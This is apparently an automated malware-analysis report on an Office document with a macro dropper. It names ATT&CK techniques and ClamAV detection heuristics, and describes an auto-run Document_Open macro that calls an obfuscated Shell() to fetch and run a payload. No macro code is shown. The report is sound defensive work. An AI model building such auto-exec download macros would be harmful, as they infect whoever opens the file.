Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The file contains VBA macros, specifically a Document_Open macro that calls the Shell() function, so the macro is designed to execute arbitrary commands as soon as the document is opened. The ClamAV signature classifies it as a dropper, suggesting its primary purpose is to download and execute a secondary payload. The command passed to Shell() is obfuscated, but it appears to assemble a command line that downloads and runs a payload.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6599832-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6599832-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16951 bytes |

SHA-256 of macros.bas: eac41f4cc4d9e012605d34d4d4e08d94193f900ea8023e0281604eb09eb39154

Preview script: first 1,000 lines of the extracted script (truncated).